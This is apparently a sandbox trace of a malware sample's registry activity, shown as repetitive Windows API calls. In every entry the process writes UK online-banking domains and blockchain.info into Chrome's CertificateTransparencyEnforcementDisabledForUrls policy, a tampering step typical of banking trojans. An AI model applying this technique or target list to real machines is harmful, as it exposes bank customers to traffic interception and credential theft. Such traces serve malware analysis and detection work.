	[0193.026] RegSetValueExA (in: hKey=0x6fc, lpValueName="291", Reserved=0x0, dwType=0x1, lpData="bankline.ulsterbank.co.uk", cbData=0x19 | out: lpData="bankline.ulsterbank.co.uk") returned 0x0
	[0193.027] RegCloseKey (hKey=0x6fc) returned 0x0
	[0193.027] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x6f8) returned 0x0
	[0193.027] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x700, lpdwDisposition=0x0) returned 0x0
	[0193.027] RegSetValueExA (in: hKey=0x700, lpValueName="292", Reserved=0x0, dwType=0x1, lpData="www.ulsterbankanytimebanking.co.uk", cbData=0x22 | out: lpData="www.ulsterbankanytimebanking.co.uk") returned 0x0
	[0193.028] RegCloseKey (hKey=0x700) returned 0x0
	[0193.028] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x6fc) returned 0x0
	[0193.028] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x704, lpdwDisposition=0x0) returned 0x0
	[0193.028] RegSetValueExA (in: hKey=0x704, lpValueName="293", Reserved=0x0, dwType=0x1, lpData="ulsterbankanytimebanking.co.uk", cbData=0x1e | out: lpData="ulsterbankanytimebanking.co.uk") returned 0x0
	[0193.029] RegCloseKey (hKey=0x704) returned 0x0
	[0193.029] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x700) returned 0x0
	[0193.029] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x708, lpdwDisposition=0x0) returned 0x0
	[0193.029] RegSetValueExA (in: hKey=0x708, lpValueName="294", Reserved=0x0, dwType=0x1, lpData="ulsterbank.co.uk", cbData=0x10 | out: lpData="ulsterbank.co.uk") returned 0x0
	[0193.030] RegCloseKey (hKey=0x708) returned 0x0
	[0193.030] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x704) returned 0x0
	[0193.030] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x70c, lpdwDisposition=0x0) returned 0x0
	[0193.030] RegSetValueExA (in: hKey=0x70c, lpValueName="295", Reserved=0x0, dwType=0x1, lpData="www.iombankibanking.com", cbData=0x17 | out: lpData="www.iombankibanking.com") returned 0x0
	[0193.031] RegCloseKey (hKey=0x70c) returned 0x0
	[0193.031] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x708) returned 0x0
	[0193.031] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x710, lpdwDisposition=0x0) returned 0x0
	[0193.032] RegSetValueExA (in: hKey=0x710, lpValueName="296", Reserved=0x0, dwType=0x1, lpData="iombankibanking.com", cbData=0x13 | out: lpData="iombankibanking.com") returned 0x0
	[0193.032] RegCloseKey (hKey=0x710) returned 0x0
	[0193.032] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x70c) returned 0x0
	[0193.033] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x714, lpdwDisposition=0x0) returned 0x0
	[0193.033] RegSetValueExA (in: hKey=0x714, lpValueName="297", Reserved=0x0, dwType=0x1, lpData="www.rbsiibanking.com", cbData=0x14 | out: lpData="www.rbsiibanking.com") returned 0x0
	[0193.034] RegCloseKey (hKey=0x714) returned 0x0
	[0193.034] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x710) returned 0x0
	[0193.034] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x718, lpdwDisposition=0x0) returned 0x0
	[0193.034] RegSetValueExA (in: hKey=0x718, lpValueName="298", Reserved=0x0, dwType=0x1, lpData="rbsiibanking.com", cbData=0x10 | out: lpData="rbsiibanking.com") returned 0x0
	[0193.035] RegCloseKey (hKey=0x718) returned 0x0
	[0193.035] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x714) returned 0x0
	[0193.035] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x71c, lpdwDisposition=0x0) returned 0x0
	[0193.035] RegSetValueExA (in: hKey=0x71c, lpValueName="299", Reserved=0x0, dwType=0x1, lpData="wealthclient.closebrothers.com", cbData=0x1e | out: lpData="wealthclient.closebrothers.com") returned 0x0
	[0193.036] RegCloseKey (hKey=0x71c) returned 0x0
	[0193.036] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x718) returned 0x0
	[0193.036] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x720, lpdwDisposition=0x0) returned 0x0
	[0193.036] RegSetValueExA (in: hKey=0x720, lpValueName="300", Reserved=0x0, dwType=0x1, lpData="banking.cumberland.co.uk", cbData=0x18 | out: lpData="banking.cumberland.co.uk") returned 0x0
	[0193.037] RegCloseKey (hKey=0x720) returned 0x0
	[0193.037] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x71c) returned 0x0
	[0193.037] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x724, lpdwDisposition=0x0) returned 0x0
	[0193.037] RegSetValueExA (in: hKey=0x724, lpValueName="301", Reserved=0x0, dwType=0x1, lpData="personal.metrobankonline.co.uk", cbData=0x1e | out: lpData="personal.metrobankonline.co.uk") returned 0x0
	[0193.038] RegCloseKey (hKey=0x724) returned 0x0
	[0193.038] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x720) returned 0x0
	[0193.038] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x728, lpdwDisposition=0x0) returned 0x0
	[0193.038] RegSetValueExA (in: hKey=0x728, lpValueName="302", Reserved=0x0, dwType=0x1, lpData="ib.lloydsbank.com", cbData=0x11 | out: lpData="ib.lloydsbank.com") returned 0x0
	[0193.039] RegCloseKey (hKey=0x728) returned 0x0
	[0193.039] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x724) returned 0x0
	[0193.039] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x72c, lpdwDisposition=0x0) returned 0x0
	[0193.039] RegSetValueExA (in: hKey=0x72c, lpValueName="303", Reserved=0x0, dwType=0x1, lpData="secure.funds.lloydsbank.com", cbData=0x1b | out: lpData="secure.funds.lloydsbank.com") returned 0x0
	[0193.040] RegCloseKey (hKey=0x72c) returned 0x0
	[0193.040] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x728) returned 0x0
	[0193.041] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x730, lpdwDisposition=0x0) returned 0x0
	[0193.041] RegSetValueExA (in: hKey=0x730, lpValueName="304", Reserved=0x0, dwType=0x1, lpData="www.tescobank.com", cbData=0x11 | out: lpData="www.tescobank.com") returned 0x0
	[0193.041] RegCloseKey (hKey=0x730) returned 0x0
	[0193.042] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x72c) returned 0x0
	[0193.042] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x734, lpdwDisposition=0x0) returned 0x0
	[0193.042] RegSetValueExA (in: hKey=0x734, lpValueName="305", Reserved=0x0, dwType=0x1, lpData="tescobank.com", cbData=0xd | out: lpData="tescobank.com") returned 0x0
	[0193.043] RegCloseKey (hKey=0x734) returned 0x0
	[0193.043] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x730) returned 0x0
	[0193.043] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x738, lpdwDisposition=0x0) returned 0x0
	[0193.043] RegSetValueExA (in: hKey=0x738, lpValueName="306", Reserved=0x0, dwType=0x1, lpData="internetbanking.tsb.co.uk", cbData=0x19 | out: lpData="internetbanking.tsb.co.uk") returned 0x0
	[0193.044] RegCloseKey (hKey=0x738) returned 0x0
	[0193.044] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x734) returned 0x0
	[0193.044] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x73c, lpdwDisposition=0x0) returned 0x0
	[0193.044] RegSetValueExA (in: hKey=0x73c, lpValueName="307", Reserved=0x0, dwType=0x1, lpData="bankonline.sboff.com", cbData=0x14 | out: lpData="bankonline.sboff.com") returned 0x0
	[0193.045] RegCloseKey (hKey=0x73c) returned 0x0
	[0193.045] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x738) returned 0x0
	[0193.045] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x740, lpdwDisposition=0x0) returned 0x0
	[0193.045] RegSetValueExA (in: hKey=0x740, lpValueName="308", Reserved=0x0, dwType=0x1, lpData="banking.smile.co.uk", cbData=0x13 | out: lpData="banking.smile.co.uk") returned 0x0
	[0193.046] RegCloseKey (hKey=0x740) returned 0x0
	[0193.046] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x73c) returned 0x0
	[0193.046] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x744, lpdwDisposition=0x0) returned 0x0
	[0193.046] RegSetValueExA (in: hKey=0x744, lpValueName="309", Reserved=0x0, dwType=0x1, lpData="online.alrayanbank.co.uk", cbData=0x18 | out: lpData="online.alrayanbank.co.uk") returned 0x0
	[0193.047] RegCloseKey (hKey=0x744) returned 0x0
	[0193.047] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x740) returned 0x0
	[0193.047] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x748, lpdwDisposition=0x0) returned 0x0
	[0193.047] RegSetValueExA (in: hKey=0x748, lpValueName="310", Reserved=0x0, dwType=0x1, lpData="mybbsaccounts.bucksbs.co.uk", cbData=0x1b | out: lpData="mybbsaccounts.bucksbs.co.uk") returned 0x0
	[0193.048] RegCloseKey (hKey=0x748) returned 0x0
	[0193.048] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x744) returned 0x0
	[0193.048] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x74c, lpdwDisposition=0x0) returned 0x0
	[0193.048] RegSetValueExA (in: hKey=0x74c, lpValueName="311", Reserved=0x0, dwType=0x1, lpData="online.ccbank.co.uk", cbData=0x13 | out: lpData="online.ccbank.co.uk") returned 0x0
	[0193.049] RegCloseKey (hKey=0x74c) returned 0x0
	[0193.049] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x748) returned 0x0
	[0193.049] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x750, lpdwDisposition=0x0) returned 0x0
	[0193.050] RegSetValueExA (in: hKey=0x750, lpValueName="312", Reserved=0x0, dwType=0x1, lpData="u-2-view.chorleybs.co.uk", cbData=0x18 | out: lpData="u-2-view.chorleybs.co.uk") returned 0x0
	[0193.050] RegCloseKey (hKey=0x750) returned 0x0
	[0193.051] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x74c) returned 0x0
	[0193.051] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x754, lpdwDisposition=0x0) returned 0x0
	[0193.051] RegSetValueExA (in: hKey=0x754, lpValueName="313", Reserved=0x0, dwType=0x1, lpData="paragonbank.com", cbData=0xf | out: lpData="paragonbank.com") returned 0x0
	[0193.052] RegCloseKey (hKey=0x754) returned 0x0
	[0193.052] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x750) returned 0x0
	[0193.052] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x758, lpdwDisposition=0x0) returned 0x0
	[0193.052] RegSetValueExA (in: hKey=0x758, lpValueName="314", Reserved=0x0, dwType=0x1, lpData="client.nedsecure-int.com", cbData=0x18 | out: lpData="client.nedsecure-int.com") returned 0x0
	[0193.053] RegCloseKey (hKey=0x758) returned 0x0
	[0193.053] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x754) returned 0x0
	[0193.053] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x75c, lpdwDisposition=0x0) returned 0x0
	[0193.053] RegSetValueExA (in: hKey=0x75c, lpValueName="315", Reserved=0x0, dwType=0x1, lpData="introducer.nedsecure-int.com", cbData=0x1c | out: lpData="introducer.nedsecure-int.com") returned 0x0
	[0193.054] RegCloseKey (hKey=0x75c) returned 0x0
	[0193.054] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x758) returned 0x0
	[0193.054] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x760, lpdwDisposition=0x0) returned 0x0
	[0193.054] RegSetValueExA (in: hKey=0x760, lpValueName="316", Reserved=0x0, dwType=0x1, lpData="www.rathbonesonline.com", cbData=0x17 | out: lpData="www.rathbonesonline.com") returned 0x0
	[0193.055] RegCloseKey (hKey=0x760) returned 0x0
	[0193.055] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x75c) returned 0x0
	[0193.055] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x764, lpdwDisposition=0x0) returned 0x0
	[0193.055] RegSetValueExA (in: hKey=0x764, lpValueName="317", Reserved=0x0, dwType=0x1, lpData="rathbonesonline.com", cbData=0x13 | out: lpData="rathbonesonline.com") returned 0x0
	[0193.056] RegCloseKey (hKey=0x764) returned 0x0
	[0193.056] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x760) returned 0x0
	[0193.056] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x768, lpdwDisposition=0x0) returned 0x0
	[0193.056] RegSetValueExA (in: hKey=0x768, lpValueName="318", Reserved=0x0, dwType=0x1, lpData="internetbanking.securetrustbank.com", cbData=0x23 | out: lpData="internetbanking.securetrustbank.com") returned 0x0
	[0193.057] RegCloseKey (hKey=0x768) returned 0x0
	[0193.057] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x764) returned 0x0
	[0193.058] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x76c, lpdwDisposition=0x0) returned 0x0
	[0193.058] RegSetValueExA (in: hKey=0x76c, lpValueName="319", Reserved=0x0, dwType=0x1, lpData="blockchain.info", cbData=0xf | out: lpData="blockchain.info") returned 0x0
	[0193.058] RegCloseKey (hKey=0x76c) returned 0x0
	[0193.059] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x768) returned 0x0
	[0193.059] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x770, lpdwDisposition=0x0) returned 0x0
	[0193.059] RegSetValueExA (in: hKey=0x770, lpValueName="320", Reserved=0x0, dwType=0x1, lpData="myaccounts.newbury.co.uk", cbData=0x18 | out: lpData="myaccounts.newbury.co.uk") returned 0x0
	[0193.060] RegCloseKey (hKey=0x770) returned 0x0
	[0193.060] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x76c) returned 0x0
	[0193.060] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x774, lpdwDisposition=0x0) returned 0x0
	[0193.060] RegSetValueExA (in: hKey=0x774, lpValueName="321", Reserved=0x0, dwType=0x1, lpData="online.paragonbank.co.uk", cbData=0x18 | out: lpData="online.paragonbank.co.uk") returned 0x0
	[0193.061] RegCloseKey (hKey=0x774) returned 0x0
	[0193.061] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x770) returned 0x0
	[0193.061] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x778, lpdwDisposition=0x0) returned 0x0
	[0193.061] RegSetValueExA (in: hKey=0x778, lpValueName="322", Reserved=0x0, dwType=0x1, lpData="www.onlinebanking.natwestoffshore.com", cbData=0x25 | out: lpData="www.onlinebanking.natwestoffshore.com") returned 0x0
	[0193.062] RegCloseKey (hKey=0x778) returned 0x0
	[0193.062] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x774) returned 0x0
	[0193.062] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x77c, lpdwDisposition=0x0) returned 0x0
